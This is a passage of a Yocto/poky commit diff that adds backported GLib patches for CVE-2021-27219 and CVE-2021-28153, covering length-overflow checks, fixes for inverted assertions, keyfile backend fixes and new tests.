+Content-Transfer-Encoding: 8bit + +The public API `g_tls_password_set_value_full()` (and the vfunc it +invokes) can only accept a `gssize` length. Ensure that nul-terminated +strings passed to `g_tls_password_set_value()` can’t exceed that length. +Use `g_memdup2()` to avoid an overflow if they’re longer than +`G_MAXUINT` similarly. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gtlspassword.c | 10 ++++++++-- + 1 file changed, 8 insertions(+), 2 deletions(-) + +diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c +index 1e437a7b6..dbcec41a8 100644 +--- a/gio/gtlspassword.c ++++ b/gio/gtlspassword.c +@@ -23,6 +23,7 @@ + #include "glibintl.h" + + #include "gioenumtypes.h" ++#include "gstrfuncsprivate.h" + #include "gtlspassword.h" + + #include <string.h> +@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password, + g_return_if_fail (G_IS_TLS_PASSWORD (password)); + + if (length < 0) +- length = strlen ((gchar *)value); ++ { ++ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */ ++ gsize length_unsigned = strlen ((gchar *) value); ++ g_return_if_fail (length_unsigned > G_MAXSSIZE); ++ length = (gssize) length_unsigned; ++ } + +- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free); ++ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free); + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch new file mode 100644 index 0000000000..a620a49269 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch @@ -0,0 +1,63 @@ +From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 14:09:40 +0000 +Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that +nul-terminated strings passed to `g_io_channel_set_line_term()` can’t +exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()` +is due to be deprecated), but not to avoid a bug, since it’s also +limited to `G_MAXUINT`. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/giochannel.c | 17 +++++++++++++---- + 1 file changed, 13 insertions(+), 4 deletions(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index c6a89d6e0..4dec20f77 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel, + const gchar *line_term, + gint length) + { ++ guint length_unsigned; ++ + g_return_if_fail (channel != NULL); + g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */ + + if (line_term == NULL) +- length = 0; +- else if (length < 0) +- length = strlen (line_term); ++ length_unsigned = 0; ++ else if (length >= 0) ++ length_unsigned = (guint) length; ++ else ++ { ++ /* FIXME: We’re constrained by line_term_len being a guint here */ ++ gsize length_size = strlen (line_term); ++ g_return_if_fail (length_size > G_MAXUINT); ++ length_unsigned = (guint) length_size; ++ } + + g_free (channel->line_term); +- channel->line_term = line_term ? g_memdup (line_term, length) : NULL; ++ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL; + channel->line_term_len = length; + } + +-- +GitLab + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch new file mode 100644 index 0000000000..3047062f54 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch @@ -0,0 +1,36 @@ +From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001 +From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com> +Date: Sun, 7 Feb 2021 23:32:40 +0100 +Subject: [PATCH 1/5] giochannel: Fix length_size bounds check + +The inverted condition is an obvious error introduced by ecdf91400e9a. + +Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323 + +(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/giochannel.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index 4dec20f77..c3f3102ff 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel, + { + /* FIXME: We’re constrained by line_term_len being a guint here */ + gsize length_size = strlen (line_term); +- g_return_if_fail (length_size > G_MAXUINT); ++ g_return_if_fail (length_size <= G_MAXUINT); + length_unsigned = (guint) length_size; + } + +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch new file mode 100644 index 0000000000..2ba26075df --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch @@ -0,0 +1,38 @@ +From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001 +From: Simon McVittie <smcv@collabora.com> +Date: Mon, 8 Feb 2021 10:34:50 +0000 +Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in + GIOChannel struct + +Adding test coverage indicated that this was another bug in 0cc11f74. + +Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings" +Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323 +Signed-off-by: Simon McVittie <smcv@collabora.com> +(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/giochannel.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index c3f3102ff..19bb06ba6 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel, + + g_free (channel->line_term); + channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL; +- channel->line_term_len = length; ++ channel->line_term_len = length_unsigned; + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch new file mode 100644 index 0000000000..2c388b4bbb --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch @@ -0,0 +1,38 @@ +From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001 +From: Simon McVittie <smcv@collabora.com> +Date: Mon, 8 Feb 2021 10:04:48 +0000 +Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion + +The intention here was to assert that the length of the password fits +in a gssize. Passwords more than half the size of virtual memory are +probably excessive. + +Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords" +Signed-off-by: Simon McVittie <smcv@collabora.com> +(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gtlspassword.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c +index dbcec41a8..bd86a6dfe 100644 +--- a/gio/gtlspassword.c ++++ b/gio/gtlspassword.c +@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password, + { + /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */ + gsize length_unsigned = strlen ((gchar *) value); +- g_return_if_fail (length_unsigned > G_MAXSSIZE); ++ g_return_if_fail (length_unsigned <= G_MAXSSIZE); + length = (gssize) length_unsigned; + } + +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch new file mode 100644 index 0000000000..356e986fe0 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch @@ -0,0 +1,100 @@ +From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001 +From: Simon McVittie <smcv@collabora.com> +Date: Mon, 8 Feb 2021 10:22:39 +0000 +Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to + set the password + +Signed-off-by: Simon McVittie <smcv@collabora.com> +(cherry picked from commit df4501316ca3903072400504a5ea76498db19538) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++ + 1 file changed, 55 insertions(+) + +diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c +index 4f0737d7e..5661e8e0d 100644 +--- a/gio/tests/tls-interaction.c ++++ b/gio/tests/tls-interaction.c +@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction, + } + + ++/* Return a copy of @str that is allocated in a silly way, to exercise ++ * custom free-functions. The returned pointer points to a copy of @str ++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */ ++static guchar * ++special_dup (const char *str) ++{ ++ GString *buf = g_string_new ("BEFORE"); ++ guchar *ret; ++ ++ g_string_append_c (buf, '\0'); ++ g_string_append (buf, str); ++ g_string_append_c (buf, '\0'); ++ g_string_append (buf, "AFTER"); ++ ret = (guchar *) g_string_free (buf, FALSE); ++ return ret + strlen ("BEFORE") + 1; ++} ++ ++ ++/* Free a copy of @str that was made with special_dup(), after asserting ++ * that it has not been corrupted. */ ++static void ++special_free (gpointer p) ++{ ++ gchar *s = p; ++ gchar *buf = s - strlen ("BEFORE") - 1; ++ ++ g_assert_cmpstr (buf, ==, "BEFORE"); ++ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER"); ++ g_free (buf); ++} ++ ++ + static GTlsInteractionResult + test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + GTlsPassword *password, +@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + GError **error) + { + TestInteraction *self; ++ const guchar *value; ++ gsize len; + + g_assert (TEST_IS_INTERACTION (interaction)); + self = TEST_INTERACTION (interaction); +@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + g_assert (error != NULL); + g_assert (*error == NULL); + ++ /* Exercise different ways to set the value */ ++ g_tls_password_set_value (password, (const guchar *) "foo", 4); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "foo", 4); ++ ++ g_tls_password_set_value (password, (const guchar *) "bar", -1); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "bar", 3); ++ ++ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "baa", 4); ++ ++ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "baz", 3); ++ + /* Don't do this in real life. Include a null terminator for testing */ + g_tls_password_set_value (password, (const guchar *)"the password", 13); + return G_TLS_INTERACTION_HANDLED; +-- +GitLab + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch new file mode 100644 index 0000000000..dd43689aae --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch @@ -0,0 +1,49 @@ +From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Feb 2021 21:16:39 +0000 +Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group + is unset + +Fix an effective regression in commit +7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when +`convert_path()` is called with a `key` which contains no slashes. In +that case, the `key` is entirely the `basename`. + +Prior to commit 7781a9cb, the code worked through a fluke of `i == -1` +cancelling out with the various additions in the `g_memdup()` call, and +effectively resulting in `g_strdup (key)`. + +Spotted by Guido Berhoerster. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gkeyfilesettingsbackend.c | 7 ++++++- + 1 file changed, 6 insertions(+), 1 deletion(-) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index 25b057672..861c3a661 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb, + } + + if (basename) +- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); ++ { ++ if (last_slash != NULL) ++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); ++ else ++ *basename = g_strdup (key); ++ } + + return TRUE; + } +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch new file mode 100644 index 0000000000..04503641c3 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch @@ -0,0 +1,43 @@ +From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Feb 2021 21:19:30 +0000 +Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group + names + +These should never have been allowed; they will result in precondition +failures from the `GKeyFile` later on in the code. + +A test will be added for this shortly. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gkeyfilesettingsbackend.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index 861c3a661..de216e615 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb, + + last_slash = strrchr (key, '/'); + ++ /* Disallow empty group names or key names */ ++ if (key_len == 0 || ++ (last_slash != NULL && ++ (*(last_slash + 1) == '\0' || ++ last_slash == key))) ++ return FALSE; ++ + if (kfsb->root_group) + { + /* if a root_group was specified, make sure the user hasn't given +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch new file mode 100644 index 0000000000..65f59287a8 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch @@ -0,0 +1,232 @@ +Backport of: + +From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Feb 2021 21:21:36 +0000 +Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile + backend + +This tests the two recent commits. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++- + 1 file changed, 169 insertions(+), 1 deletion(-) + +--- a/gio/tests/gsettings.c ++++ b/gio/tests/gsettings.c +@@ -1,3 +1,4 @@ ++#include <errno.h> + #include <stdlib.h> + #include <locale.h> + #include <libintl.h> +@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con + (*b) = TRUE; + } + ++typedef struct ++{ ++ const gchar *path; ++ const gchar *root_group; ++ const gchar *keyfile_group; ++ const gchar *root_path; ++} KeyfileTestData; ++ + /* + * Test that using a keyfile works + */ +@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture, + g_free (str); + + g_settings_set (settings, "farewell", "s", "cheerio"); +- ++ ++ /* Check that empty keys/groups are not allowed. */ ++ g_assert_false (g_settings_is_writable (settings, "")); ++ g_assert_false (g_settings_is_writable (settings, "/")); ++ + /* When executing as root, changing the mode of the keyfile will have + * no effect on the writability of the settings. + */ +@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture, + g_free (keyfile_path); + } + ++/* ++ * Test that using a keyfile works with a schema with no path set. ++ */ ++static void ++test_keyfile_no_path (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ const KeyfileTestData *test_data = user_data; ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ GKeyFile *keyfile; ++ gboolean writable; ++ gchar *key = NULL; ++ GError *error = NULL; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path); ++ g_object_unref (kf_backend); ++ ++ g_settings_reset (settings, "test-boolean"); ++ g_assert_true (g_settings_get_boolean (settings, "test-boolean")); ++ ++ writable = g_settings_is_writable (settings, "test-boolean"); ++ g_assert_true (writable); ++ g_settings_set (settings, "test-boolean", "b", FALSE); ++ ++ g_assert_false (g_settings_get_boolean (settings, "test-boolean")); ++ ++ g_settings_delay (settings); ++ g_settings_set (settings, "test-boolean", "b", TRUE); ++ g_settings_apply (settings); ++ ++ keyfile = g_key_file_new (); ++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL)); ++ ++ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL)); ++ ++ g_key_file_free (keyfile); ++ ++ g_settings_reset (settings, "test-boolean"); ++ g_settings_apply (settings); ++ keyfile = g_key_file_new (); ++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL)); ++ ++ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error)); ++ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND); ++ g_clear_error (&error); ++ ++ /* Check that empty keys/groups are not allowed. */ ++ g_assert_false (g_settings_is_writable (settings, "")); ++ g_assert_false (g_settings_is_writable (settings, "/")); ++ ++ /* Keys which ghost the root group name are not allowed. This can only be ++ * tested when the path is `/` as otherwise it acts as a prefix and prevents ++ * any ghosting. */ ++ if (g_str_equal (test_data->path, "/")) ++ { ++ key = g_strdup_printf ("%s/%s", test_data->root_group, ""); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ ++ key = g_strdup_printf ("%s/%s", test_data->root_group, "/"); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ ++ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean"); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ } ++ ++ g_key_file_free (keyfile); ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. */ ++ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0); ++ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ ++/* ++ * Test that a keyfile rejects writes to keys outside its root path. ++ */ ++static void ++test_keyfile_outside_root_path (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root"); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/"); ++ g_object_unref (kf_backend); ++ ++ g_assert_false (g_settings_is_writable (settings, "test-boolean")); ++ ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so ++ * don’t error on failure. */ ++ g_remove (store_path); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ ++/* ++ * Test that a keyfile rejects writes to keys in the root if no root group is set. ++ */ ++static void ++test_keyfile_no_root_group (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/"); ++ g_object_unref (kf_backend); ++ ++ g_assert_false (g_settings_is_writable (settings, "test-boolean")); ++ g_assert_true (g_settings_is_writable (settings, "child/test-boolean")); ++ ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so ++ * don’t error on failure. */ ++ g_remove (store_path); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ + /* Test that getting child schemas works + */ + static void +@@ -2844,6 +3000,14 @@ main (int argc, char *argv[]) + gchar *override_text; + gchar *enums; + gint result; ++ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" }; ++ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" }; ++ const KeyfileTestData keyfile_test_data_long_path = { ++ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/", ++ "root", ++ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch", ++ "/" ++ }; + + /* Meson build sets this */ + #ifdef TEST_LOCALE_PATH +@@ -2967,6 +3131,11 @@ main (int argc, char *argv[]) + } + + g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown); ++ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown); ++ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown); + g_test_add_func ("/gsettings/child-schema", test_child_schema); + g_test_add_func ("/gsettings/strinfo", test_strinfo); + g_test_add_func ("/gsettings/enums", test_enums); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch new file mode 100644 index 0000000000..c89ca20726 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch @@ -0,0 +1,27 @@ +From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 24 Feb 2021 17:33:38 +0000 +Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/glocalfileoutputstream.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi + mode = mode_from_flags_or_info (flags, reference_info); + + /* We only need read access to the original file if we are creating a backup. +- * We also add O_CREATE to avoid a race if the file was just removed */ ++ * We also add O_CREAT to avoid a race if the file was just removed */ + if (create_backup || readable) + open_flags = O_RDWR | O_CREAT | O_BINARY; + else diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch new file mode 100644 index 0000000000..8a35bab4de --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch @@ -0,0 +1,42 @@ +From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 24 Feb 2021 17:34:32 +0000 +Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Since a following commit is going to add a new test which references +Gitlab, so it’s best to move the URI bases inside the test cases. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/tests/file.c | 4 +--- + 1 file changed, 1 insertion(+), 3 deletions(-) + +--- a/gio/tests/file.c ++++ b/gio/tests/file.c +@@ -685,7 +685,7 @@ test_replace_cancel (void) + guint count; + GError *error = NULL; + +- g_test_bug ("629301"); ++ g_test_bug ("https://bugzilla.gnome.org/629301"); + + path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error); + g_assert_no_error (error); +@@ -1784,8 +1784,6 @@ main (int argc, char *argv[]) + { + g_test_init (&argc, &argv, NULL); + +- g_test_bug_base ("http://bugzilla.gnome.org/"); +- + g_test_add_func ("/file/basic", test_basic); + g_test_add_func ("/file/build-filename", test_build_filename); + g_test_add_func ("/file/parent", test_parent); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch new file mode 100644 index 0000000000..a82febd26e --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch 